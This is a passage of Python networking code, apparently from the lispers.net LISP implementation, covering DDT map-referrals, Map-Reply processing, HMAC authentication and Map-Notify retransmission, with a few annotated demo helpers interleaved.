    if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
    if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
    if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
    if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0

    is_ms_peer = False
    referral_count = 0
    ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
    if (ddt_entry != None):
        referral_count = len(ddt_entry.delegation_set)
        is_ms_peer = ddt_entry.is_ms_peer_entry()
        ddt_entry.map_referrals_sent += 1

    #
    # Mark the referral incomplete unless this Map-Server peers with all
    # the other Map-Servers for the prefix.
    #
    if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
    if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
        incomplete = (is_ms_peer == False)

    #
    # Encode the EID-record.
    #
    eid_record = lisp_eid_record()
    eid_record.rloc_count = referral_count
    eid_record.authoritative = True
    eid_record.action = action
    eid_record.ddt_incomplete = incomplete
    eid_record.eid = eid_prefix
    eid_record.group = group_prefix
    eid_record.record_ttl = ttl

    packet += eid_record.encode()
    eid_record.print_record("    ", True)

    #
    # Encode one RLOC-record per delegate.
    #
    if (referral_count != 0):
        for ds in ddt_entry.delegation_set:
            rloc_record = lisp_rloc_record()
            rloc_record.rloc = ds.delegate_address
            rloc_record.priority = ds.priority
            rloc_record.weight = ds.weight
            rloc_record.mpriority = 255
            rloc_record.mweight = 0
            rloc_record.reach_bit = True
            packet += rloc_record.encode()
            rloc_record.print_record("        ")

    #
    # Send to the control port unless the request came over UDP from lig
    # (nonce 0).
    #
    if (map_request.nonce != 0): port = LISP_CTRL_PORT
    lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
    return
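#
# lisp_send_negative_map_reply
#
# Sends a negative Map-Reply: native-forward action for unicast, drop for
# multicast, and send-map-request for crypto-EIDs; subscription requests
# are acked with a Map-Notify instead.
#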
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
    xtr_id, pubsub):

    lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}".format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
        red(dest.print_address(), False)))

    action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else LISP_DROP_ACTION

    #
    # Crypto-EIDs get a send-map-request action so the ITR tries again
    # once the EID registers.
    #
    if (lisp_get_eid_hash(eid) != None):
        action = LISP_SEND_MAP_REQUEST_ACTION

    packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, None,
        None, False, False)

    #
    # A subscription request is acked with a Map-Notify instead of a
    # Map-Reply.
    #
    if (pubsub):
        lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
            xtr_id)
    else:
        lisp_send_map_reply(sockets, packet, dest, port)

    return
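#
# lisp_retransmit_ddt_map_request
#
# Retries a queued DDT Map-Request until the retry limit is reached,
# charging a no-response against the referral-node that failed to answer.
#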
def lisp_retransmit_ddt_map_request(mr):
    source_str = mr.mr_source.print_address()
    eid_str = mr.print_eid_tuple()
    nonce = mr.nonce

    #
    # Count a no-response against the referral-node the last request was
    # sent to.
    #
    if (mr.last_request_sent_to):
        last_str = mr.last_request_sent_to.print_address()
        ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
            mr.last_cached_prefix[1], True)
        if (ref and last_str in ref.referral_set):
            ref.referral_set[last_str].no_responses += 1

    #
    # Give up after the retry limit and dequeue the request.
    #
    if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
        lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}".format(green(eid_str, False), lisp_hex_string(nonce)))
        mr.dequeue_map_request()
        return

    mr.retry_count += 1

    s = green(source_str, False)
    d = green(eid_str, False)
    lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}".format(bold("Map-Request", False), "P" if mr.from_pitr else "",
        red(mr.itr.print_address(), False), s, d,
        lisp_hex_string(nonce)))

    lisp_send_ddt_map_request(mr, False)

    #
    # Restart the retransmission timer.
    #
    mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
        lisp_retransmit_ddt_map_request, [mr])
    mr.retransmit_timer.start()
    return
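#
# lisp_get_referral_node
#
# Looks like best-priority referral-node selection with a deterministic
# hash tiebreak across equal-priority nodes, e.g. (hypothetical values):
#
#   node = lisp_get_referral_node(referral, mr.mr_source, mr.eid)
#   if (node != None): send the ECM to node.referral_address
#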
def lisp_get_referral_node(referral, source_eid, dest_eid):

    #
    # Collect the up referral-nodes that share the best (lowest) priority.
    #
    ref_set = []
    for ref_node in list(referral.referral_set.values()):
        if (ref_node.updown == False): continue
        if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
            ref_set.append(ref_node)
        elif (ref_set[0].priority > ref_node.priority):
            ref_set = []
            ref_set.append(ref_node)

    count = len(ref_set)
    if (count == 0): return(None)

    hashval = dest_eid.hash_address(source_eid)
    hashval = hashval % count
    return(ref_set[hashval])
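#
# lisp_send_ddt_map_request
#
# Sends a queued Map-Request down (or, with send_to_root, up) the DDT
# hierarchy: find a referral cache entry, pick a referral-node, and
# ECM-encapsulate the request to it.
#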
def lisp_send_ddt_map_request(mr, send_to_root):
    lisp_sockets = mr.lisp_sockets
    nonce = mr.nonce
    itr = mr.itr
    mr_source = mr.mr_source
    eid_str = mr.print_eid_tuple()

    #
    # Give up after 8 sends for the same queued Map-Request.
    #
    if (mr.send_count == 8):
        lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format(green(eid_str, False), lisp_hex_string(nonce)))
        mr.dequeue_map_request()
        return

    #
    # When jumping to root, look up the zero-length prefix.
    #
    if (send_to_root):
        lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        mr.tried_root = True
        lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
    else:
        lookup_eid = mr.eid
        lookup_group = mr.group

    #
    # Find a referral cache entry covering the EID.
    #
    referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
    if (referral == None):
        lprint("No referral cache entry found")
        lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
            nonce, itr, mr.sport, 15, None, False)
        return

    referral_str = referral.print_eid_tuple()
    lprint("Found referral cache entry {}, referral-type: {}".format(referral_str,
        referral.print_referral_type()))

    ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
    if (ref_node == None):
        lprint("No reachable referral-nodes found")
        mr.dequeue_map_request()
        lisp_send_negative_map_reply(lisp_sockets, referral.eid,
            referral.group, nonce, itr, mr.sport, 1, None, False)
        return

    lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}".format(ref_node.referral_address.print_address(),
        referral.print_referral_type(), green(eid_str, False),
        lisp_hex_string(nonce)))

    #
    # ECM-encapsulate the Map-Request to the referral-node.
    #
    to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
        referral.referral_type == LISP_DDT_ACTION_MS_ACK)
    lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
        ref_node.referral_address, to_ms=to_ms, ddt=True)

    #
    # Remember where and when this request was last sent.
    #
    mr.last_request_sent_to = ref_node.referral_address
    mr.last_sent = lisp_get_timestamp()
    mr.send_count += 1
    ref_node.map_requests_sent += 1
    return
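#
# lisp_mr_process_map_request
#
# Map-Resolver entry point: queue the Map-Request and start the DDT
# iteration for it.
#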
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
    sport, mr_source):

    eid = map_request.target_eid
    group = map_request.target_group
    deid_str = map_request.print_eid_tuple()
    seid_str = mr_source.print_address()
    nonce = map_request.nonce

    s = green(seid_str, False)
    d = green(deid_str, False)
    lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}".format("P" if map_request.pitr_bit else "",
        red(ecm_source.print_address(), False), s, d,
        lisp_hex_string(nonce)))

    #
    # Queue the request and kick off the DDT lookup.
    #
    mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
    mr.packet = packet
    mr.itr = ecm_source
    mr.mr_source = mr_source
    mr.sport = sport
    mr.from_pitr = map_request.pitr_bit
    mr.queue_map_request()

    lisp_send_ddt_map_request(mr, False)
    return
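#
# lisp_process_map_request
#
# Top-level Map-Request demux: handle RLOC-probes and SMRs first, then
# dispatch to the ETR, Map-Server, Map-Resolver, and/or DDT code depending
# on which roles this lisp process is running.
#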
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
    mr_source, mr_port, ddt_request, ttl, timestamp):

    orig_packet = packet
    map_request = lisp_map_request()
    packet = map_request.decode(packet, mr_source, mr_port)
    if (packet == None):
        lprint("Could not decode Map-Request packet")
        return

    map_request.print_map_request()

    #
    # RLOC-probes are handled separately.
    #
    if (map_request.rloc_probe):
        lisp_process_rloc_probe_request(lisp_sockets, map_request, mr_source,
            mr_port, ttl, timestamp)
        return

    #
    # Process solicit-map-requests (SMRs) and SMR-invoked Map-Requests.
    #
    if (map_request.smr_bit):
        lisp_process_smr(map_request)

    if (map_request.smr_invoked_bit):
        lisp_process_smr_invoked_request(map_request)

    #
    # Dispatch based on the roles this process runs.
    #
    if (lisp_i_am_etr):
        lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
            mr_port, ttl, timestamp)

    if (lisp_i_am_ms):
        packet = orig_packet
        eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
            orig_packet, map_request, mr_source, mr_port, ecm_source)
        if (ddt_request):
            lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
                ecm_port, ddt_action, eid, group)
        return

    if (lisp_i_am_mr and not ddt_request):
        lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
            ecm_source, mr_port, mr_source)

    if (lisp_i_am_ddt or ddt_request):
        packet = orig_packet
        lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
            ecm_port)

    return

#
# lisp_store_mr_stats
#
# Count a negative Map-Reply against the Map-Resolver it came from and
# maintain a windowed RTT sum.
#
def lisp_store_mr_stats(source, nonce):
    mr = lisp_get_map_resolver(source, None)
    if (mr == None): return

    #
    # Count and timestamp the reply.
    #
    mr.neg_map_replies_received += 1
    mr.last_reply = lisp_get_timestamp()

    #
    # Reset the accumulated RTT every 100 replies so the average tracks
    # recent behavior.
    #
    if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0

    #
    # Compute an RTT sample only when the nonce matches the last
    # Map-Request sent to this Map-Resolver.
    #
    if (mr.last_nonce == nonce):
        mr.total_rtt += (time.time() - mr.last_used)
        mr.last_nonce = 0

    if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
    return
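
#
# demo_store_rtt
#
# Illustrative sketch added for clarity; it is not part of the original
# lispers.net sources. It reduces the windowed RTT accounting of
# lisp_store_mr_stats() above to standalone form. All names here are
# hypothetical.
#
def demo_store_rtt(stats, nonce, now):
    stats["replies"] += 1

    # Reset the accumulated RTT every 100 replies so the average
    # reflects recent behavior only.
    if ((stats["replies"] % 100) == 0): stats["total_rtt"] = 0

    # Only a reply whose nonce matches the last request sent contributes
    # an RTT sample.
    if (stats["last_nonce"] == nonce):
        stats["total_rtt"] += (now - stats["last_used"])
        stats["last_nonce"] = 0
    return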

#
# lisp_process_map_reply
#
# Process a received Map-Reply: decode each EID-record and RLOC-record,
# then add or replace map-cache entries.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl, itr_in_ts):
    global lisp_map_cache

    map_reply = lisp_map_reply()
    packet = map_reply.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Reply packet")
        return

    map_reply.print_map_reply()

    #
    # Process each EID-record in the Map-Reply.
    #
    rloc_key_change = None
    for i in range(map_reply.record_count):
        eid_record = lisp_eid_record()
        packet = eid_record.decode(packet)
        if (packet == None):
            lprint("Could not decode EID-record in Map-Reply packet")
            return
        eid_record.print_record("  ", False)

        #
        # A negative Map-Reply carries no RLOCs. Count it against the
        # Map-Resolver it came from.
        #
        if (eid_record.rloc_count == 0):
            lisp_store_mr_stats(source, map_reply.nonce)

        multicast = (eid_record.group.is_null() == False)

        #
        # For LISP-Decent push mode, don't process drop-action (S,G)
        # records sourced locally.
        #
        if (lisp_decent_push_configured):
            action = eid_record.action
            if (multicast and action == LISP_DROP_ACTION):
                if (eid_record.eid.is_local()): continue

        #
        # Ignore unicast records with an unspecified EID.
        #
        if (multicast == False and eid_record.eid.is_null()): continue

        #
        # Look up map-cache entry to decide if we add or replace.
        #
        if (multicast):
            mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
        else:
            mc = lisp_map_cache.lookup_cache(eid_record.eid, True)

        new_mc = (mc == None)

        #
        # Don't let a Map-Reply overwrite a gleaned entry, and don't add
        # an entry for an EID we are configured to glean.
        #
        if (mc == None):
            glean, x, y = lisp_allow_gleaning(eid_record.eid,
                eid_record.group, None)
            if (glean): continue
        else:
            if (mc.gleaned): continue

        #
        # Process each RLOC-record in this EID-record.
        #
        rloc_set = []
        mrloc = None
        for j in range(eid_record.rloc_count):
            rloc_record = lisp_rloc_record()
            rloc_record.keys = map_reply.keys
            packet = rloc_record.decode(packet, map_reply.nonce)
            if (packet == None):
                lprint("Could not decode RLOC-record in Map-Reply packet")
                return
            rloc_record.print_record("    ")

            old_rloc = None
            if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
            if (old_rloc):
                rloc = old_rloc
            else:
                rloc = lisp_rloc()

            #
            # Store contents of the RLOC-record in the lisp_rloc()
            # instance.
            #
            port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
                source)
            rloc.echo_nonce_capable = map_reply.echo_nonce_capable

            if (rloc.echo_nonce_capable):
                addr_str = rloc.rloc.print_address_no_iid()
                if (lisp_get_echo_nonce(None, addr_str) == None):
                    lisp_echo_nonce(addr_str)

            #
            # Encode timestamps into telemetry JSON when requested.
            #
            if (rloc.json):
                if (lisp_is_json_telemetry(rloc.json.json_string)):
                    json_string = rloc.json.json_string
                    json_string = lisp_encode_telemetry(json_string,
                        ii=itr_in_ts)
                    rloc.json.json_string = json_string

            #
            # Process RLOC-probe reply for this RLOC when the reply came
            # from the same address-family.
            #
            if (map_reply.rloc_probe and rloc_record.probe_bit):
                if (rloc.rloc.afi == source.afi):
                    lisp_process_rloc_probe_reply(rloc, source, port,
                        map_reply, ttl, mrloc)
                if (rloc.rloc.is_multicast_address()): mrloc = rloc

            #
            # Append to the RLOC-set for this EID-record.
            #
            rloc_set.append(rloc)

            #
            # Remember any RLOC that recently rekeyed so an external
            # data-plane can be told about the new keys.
            #
            if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
                rloc_key_change = rloc

        #
        # NAT-traversal RLOC-set optimization: ITRs keep private RLOCs
        # and RTR RLOCs (priority 254); RTRs keep everything else.
        #
        if (map_reply.rloc_probe == False and lisp_nat_traversal):
            new_set = []
            log_set = []
            for rloc in rloc_set:

                #
                # Private RLOCs are reachable within the same NAT realm;
                # prefer them but mark unreachable until probed.
                #
                if (rloc.rloc.is_private_address()):
                    rloc.priority = 1
                    rloc.state = LISP_RLOC_UNREACH_STATE
                    new_set.append(rloc)
                    log_set.append(rloc.rloc.print_address_no_iid())
                    continue

                if (rloc.priority == 254 and lisp_i_am_rtr == False):
                    new_set.append(rloc)
                    log_set.append(rloc.rloc.print_address_no_iid())
                if (rloc.priority != 254 and lisp_i_am_rtr):
                    new_set.append(rloc)
                    log_set.append(rloc.rloc.print_address_no_iid())

            if (log_set != []):
                rloc_set = new_set
                lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))

        #
        # Prune JSON-only RLOC-records with no RLOC address; they are not
        # useful in the map-cache.
        #
        new_set = []
        for rloc in rloc_set:
            if (rloc.json != None): continue
            new_set.append(rloc)

        if (new_set != []):
            count = len(rloc_set) - len(new_set)
            lprint("Pruning {} no-address RLOC-records for map-cache".format(
                count))
            rloc_set = new_set

        #
        # An RLOC-probe reply refreshes an existing entry; keep its set.
        #
        if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set

        #
        # If the RLOC-set changed, remove the old RLOCs from the
        # RLOC-probe list.
        #
        rloc_set_change = new_mc
        if (mc and rloc_set != mc.rloc_set):
            mc.delete_rlocs_from_rloc_probe_list()
            rloc_set_change = True

        #
        # Add or replace the map-cache entry.
        #
        uptime = mc.uptime if (mc) else None
        if (mc == None):
            mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
            mc.mapping_source = source

        #
        # RTRs use a short TTL for multicast entries.
        #
        if (lisp_i_am_rtr and eid_record.group.is_null() == False):
            mc.map_cache_ttl = LISP_MCAST_TTL
        else:
            mc.map_cache_ttl = eid_record.store_ttl()

        mc.action = eid_record.action
        mc.add_cache(rloc_set_change)

        add_or_replace = "Add"
        if (uptime):
            mc.uptime = uptime
            mc.refresh_time = lisp_get_timestamp()
            add_or_replace = "Replace"

        lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
            green(mc.print_eid_tuple(), False), len(rloc_set)))

        #
        # Tell an external data-plane about key material changes.
        #
        if (lisp_ipc_dp_socket and rloc_key_change != None):
            lisp_write_ipc_keys(rloc_key_change)

        #
        # Trigger RLOC-probes immediately for a brand-new map-cache entry.
        #
        if (new_mc):
            probe = bold("RLOC-probe", False)
            for rloc in mc.best_rloc_set:
                addr_str = red(rloc.rloc.print_address_no_iid(), False)
                lprint("Trigger {} to {}".format(probe, addr_str))
                lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
    return

#
# lisp_compute_auth
#
# Compute the authentication hash for a Map-Register and encode it into
# the packet.
#
def lisp_compute_auth(packet, map_register, password):
    if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)

    packet = map_register.zero_auth(packet)
    hashval = lisp_hash_me(packet, map_register.alg_id, password, False)

    #
    # Hash is computed over the packet with a zeroed authentication
    # field; now insert the hash.
    #
    map_register.auth_data = hashval
    packet = map_register.encode_auth(packet)
    return(packet)

#
# lisp_hash_me
#
# Run HMAC over packet contents with the configured password. Only the
# SHA-1-96 and SHA-256-128 algorithm IDs are supported.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
    if (alg_id == LISP_NONE_ALG_ID): return(True)

    if (alg_id == LISP_SHA_1_96_ALG_ID):
        hash_alg = hashlib.sha1
    if (alg_id == LISP_SHA_256_128_ALG_ID):
        hash_alg = hashlib.sha256

    if (do_hex):
        hashval = hmac.new(password.encode(), packet, hash_alg).hexdigest()
    else:
        hashval = hmac.new(password.encode(), packet, hash_alg).digest()
    return(hashval)
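
#
# demo_hmac_auth
#
# Hedged usage sketch added for clarity; not part of the original
# lispers.net sources. It shows, with only the standard library, the two
# digest forms lisp_hash_me() produces: the hex digest used when
# verifying a received packet and the raw digest stored when encoding
# one. The function name and arguments are hypothetical.
#
def demo_hmac_auth(password, packet_bytes):
    import hashlib
    import hmac

    # do_hex=True path: hex string compared against the packet's
    # authentication field.
    hex_digest = hmac.new(password.encode(), packet_bytes,
        hashlib.sha256).hexdigest()

    # do_hex=False path: raw bytes written into the packet.
    raw_digest = hmac.new(password.encode(), packet_bytes,
        hashlib.sha256).digest()
    return(hex_digest, raw_digest)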

#
# lisp_verify_auth
#
# Compare the authentication hash computed over the packet against the
# authentication data the packet carried.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
    if (alg_id == LISP_NONE_ALG_ID): return(True)

    hashval = lisp_hash_me(packet, alg_id, password, True)
    matched = (hashval == auth_data)

    #
    # Print both hash values when authentication fails.
    #
    if (matched == False):
        lprint("Hashed value: {} does not match packet value: {}".format(
            hashval, auth_data))
    return(matched)

#
# lisp_retransmit_map_notify
#
# Retransmit a Map-Notify that has not been acknowledged, up to the
# retry limit; then dequeue its retransmission state.
#
def lisp_retransmit_map_notify(map_notify):
    dest = map_notify.etr
    port = map_notify.etr_port

    #
    # If we have reached the maximum number of retransmissions, dequeue
    # the Map-Notify state and stop the timer.
    #
    if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
        lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}".\
            format(map_notify.nonce_key, red(dest.print_address(), False)))

        key = map_notify.nonce_key
        if (key in lisp_map_notify_queue):
            map_notify.retransmit_timer.cancel()
            lprint("Dequeue Map-Notify from retransmit queue, key is: {}".\
                format(key))
            try:
                lisp_map_notify_queue.pop(key)
            except:
                lprint("Key not found in Map-Notify queue")
        return

    lisp_sockets = map_notify.lisp_sockets
    map_notify.retry_count += 1

    lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format(
        bold("Map-Notify", False), map_notify.nonce_key,
        red(dest.print_address(), False), map_notify.retry_count))

    lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
    if (map_notify.site): map_notify.site.map_notifies_sent += 1

    #
    # Restart the retransmit timer.
    #
    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return
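
#
# demo_retransmit
#
# Hedged sketch added for clarity; not part of the original lispers.net
# sources. It reduces the retransmit pattern of
# lisp_retransmit_map_notify() to its essentials: count retries, resend,
# and re-arm a one-shot threading.Timer that calls this same function.
# All names and the default limits are hypothetical stand-ins for
# LISP_MAX_MAP_NOTIFY_RETRIES and LISP_MAP_NOTIFY_INTERVAL.
#
def demo_retransmit(send, state, max_retries=3, interval=2.0):
    import threading

    if (state["retries"] >= max_retries):
        return(None)

    state["retries"] += 1
    send()

    # threading.Timer is one-shot; it must be re-created on every
    # retransmission.
    state["timer"] = threading.Timer(interval, demo_retransmit,
        [send, state, max_retries, interval])
    state["timer"].start()
    return(state["timer"])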

#
# lisp_send_merged_map_notify
#
# Send a Map-Notify with the merged RLOC-set to every ETR that
# contributed a registration.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
    eid_record):

    #
    # Encode EID-record from the merged RLOC-set.
    #
    eid_record.rloc_count = len(parent.registered_rlocs)
    packet_record = eid_record.encode()
    eid_record.print_record("Merged Map-Notify ", False)

    #
    # Encode RLOC-records from the merged RLOC-set.
    #
    for xtr in parent.registered_rlocs:
        rloc_record = lisp_rloc_record()
        rloc_record.store_rloc_entry(xtr)
        rloc_record.local_bit = True
        rloc_record.probe_bit = False
        rloc_record.reach_bit = True
        packet_record += rloc_record.encode()
        rloc_record.print_record("    ")
        del(rloc_record)

    #
    # Send a Map-Notify to each ETR that registered.
    #
    for xtr in parent.registered_rlocs:
        dest = xtr.rloc
        map_notify = lisp_map_notify(lisp_sockets)
        map_notify.record_count = 1
        key_id = map_register.key_id
        map_notify.key_id = key_id
        map_notify.alg_id = map_register.alg_id
        map_notify.auth_len = map_register.auth_len
        map_notify.nonce = map_register.nonce
        map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
        map_notify.etr.copy_address(dest)
        map_notify.etr_port = map_register.sport
        map_notify.site = parent.site
        packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
        map_notify.print_notify()

        #
        # Put Map-Notify state on the retransmission queue, replacing any
        # pending state for the same nonce.
        #
        key = map_notify.nonce_key
        if (key in lisp_map_notify_queue):
            old_notify = lisp_map_notify_queue[key]
            old_notify.retransmit_timer.cancel()
            del(old_notify)
        lisp_map_notify_queue[key] = map_notify

        #
        # Send it out.
        #
        lprint("Send merged Map-Notify to ETR {}".format(
            red(dest.print_address(), False)))
        lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)

        parent.site.map_notifies_sent += 1

        #
        # Start the retransmit timer.
        #
        map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
            lisp_retransmit_map_notify, [map_notify])
        map_notify.retransmit_timer.start()
    return

#
# lisp_build_map_notify
#
# Build and send a Map-Notify, either to acknowledge a Map-Register or,
# unsolicited, to announce an RLOC-set change.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
    source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):

    key = lisp_hex_string(nonce) + source.print_address()

    #
    # If Map-Notify state is already pending for this xTR, we are already
    # retransmitting; don't queue another one.
    #
    lisp_remove_eid_from_map_notify_queue(eid_list)
    if (key in lisp_map_notify_queue):
        map_notify = lisp_map_notify_queue[key]
        s = red(source.print_address_no_iid(), False)
        lprint("Map-Notify with nonce 0x{} pending for xTR {}".format(
            lisp_hex_string(map_notify.nonce), s))
        return

    map_notify = lisp_map_notify(lisp_sockets)
    map_notify.record_count = record_count
    map_notify.key_id = key_id
    map_notify.alg_id = alg_id
    map_notify.auth_len = auth_len
    map_notify.nonce = nonce
    map_notify.nonce_key = lisp_hex_string(nonce)
    map_notify.etr.copy_address(source)
    map_notify.etr_port = port
    map_notify.site = site
    map_notify.eid_list = eid_list

    #
    # Queue for retransmission only when this is an unsolicited
    # Map-Notify (acks are not retransmitted).
    #
    if (map_register_ack == False):
        key = map_notify.nonce_key
        lisp_map_notify_queue[key] = map_notify

    if (map_register_ack):
        lprint("Send Map-Notify to ack Map-Register")
    else:
        lprint("Send Map-Notify for RLOC-set change")

    #
    # Encode packet and authenticate it.
    #
    packet = map_notify.encode(eid_records, site.auth_key[key_id])
    map_notify.print_notify()

    if (map_register_ack == False):
        eid_record = lisp_eid_record()
        eid_record.decode(eid_records)
        eid_record.print_record("  ", False)

    #
    # Send the Map-Notify.
    #
    lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
    site.map_notifies_sent += 1

    if (map_register_ack): return

    #
    # Start the retransmit timer for the unsolicited Map-Notify.
    #
    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return

#
# lisp_send_map_notify_ack
#
# Acknowledge a received Map-Notify back to the Map-Server.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
    map_notify.map_notify_ack = True

    #
    # Encode packet and authenticate it.
    #
    packet = map_notify.encode(eid_records, ms.password)
    map_notify.print_notify()

    #
    # Send the Map-Notify-Ack.
    #
    dest = ms.map_server
    lprint("Send Map-Notify-Ack to {}".format(
        red(dest.print_address(), False)))
    lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
    return

#
# lisp_send_multicast_map_notify
#
# Send an unsolicited, unauthenticated Map-Notify carrying the (S,G)
# RLOC-set of a site-eid to one ITR or RTR.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):

    map_notify = lisp_map_notify(lisp_sockets)
    map_notify.record_count = 1
    map_notify.nonce = lisp_get_control_nonce()
    map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
    map_notify.etr.copy_address(xtr)
    map_notify.etr_port = LISP_CTRL_PORT
    map_notify.eid_list = eid_list
    key = map_notify.nonce_key

    #
    # If Map-Notify state is already pending for this xTR, don't queue
    # another one.
    #
    lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
    if (key in lisp_map_notify_queue):
        map_notify = lisp_map_notify_queue[key]
        lprint("Map-Notify with nonce 0x{} pending for ITR {}".format(
            map_notify.nonce, red(xtr.print_address_no_iid(), False)))
        return

    #
    # Put Map-Notify state on the retransmission queue.
    #
    lisp_map_notify_queue[key] = map_notify

    #
    # Decide whether to send the RTR-set or the registered RLOC-set.
    # Don't send the RTR-set to an RTR that is itself in the set.
    #
    notify_rtrs = site_eid.rtrs_in_rloc_set()
    if (notify_rtrs):
        if (site_eid.is_rtr_in_rloc_set(xtr)): notify_rtrs = False

    #
    # Build the EID-record, counting only the RLOCs we will include.
    #
    eid_record = lisp_eid_record()
    eid_record.record_ttl = 1440
    eid_record.eid.copy_address(site_eid.eid)
    eid_record.group.copy_address(site_eid.group)
    eid_record.rloc_count = 0
    for rloc_entry in site_eid.registered_rlocs:
        if (notify_rtrs ^ rloc_entry.is_rtr()): continue
        eid_record.rloc_count += 1

    packet = eid_record.encode()

    #
    # Print contents of the Map-Notify.
    #
    map_notify.print_notify()
    eid_record.print_record("  ", False)

    #
    # Encode the matching RLOC-records.
    #
    for rloc_entry in site_eid.registered_rlocs:
        if (notify_rtrs ^ rloc_entry.is_rtr()): continue
        rloc_record = lisp_rloc_record()
        rloc_record.store_rloc_entry(rloc_entry)
        rloc_record.local_bit = True
        rloc_record.probe_bit = False
        rloc_record.reach_bit = True
        packet += rloc_record.encode()
        rloc_record.print_record("    ")

    #
    # Encode the Map-Notify with an empty password (unauthenticated).
    #
    packet = map_notify.encode(packet, "")
    if (packet == None): return

    #
    # Send the Map-Notify.
    #
    lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)

    #
    # Start the retransmit timer.
    #
    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return

#
# lisp_queue_multicast_map_notify
#
# For each (S,G) in the supplied list, send a Map-Notify to the ITRs or
# RTRs that need to track the registered RLE/RLOC-set.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
    null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)

    for sg in rle_list:
        site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
        if (site_eid == None): continue

        #
        # Get the merged registered RLOC-set. If it is empty (merging in
        # progress), collect the RTR-set from individual registrations.
        #
        rloc_set = site_eid.registered_rlocs
        if (len(rloc_set) == 0):
            rtr_dict = {}
            for individual in list(site_eid.individual_registrations.values()):
                for rloc_entry in individual.registered_rlocs:
                    if (rloc_entry.is_rtr() == False): continue
                    rtr_dict[rloc_entry.rloc.print_address()] = rloc_entry
            rloc_set = list(rtr_dict.values())

        #
        # Build the list of xTRs to notify. For a (0.0.0.0/0, G) entry,
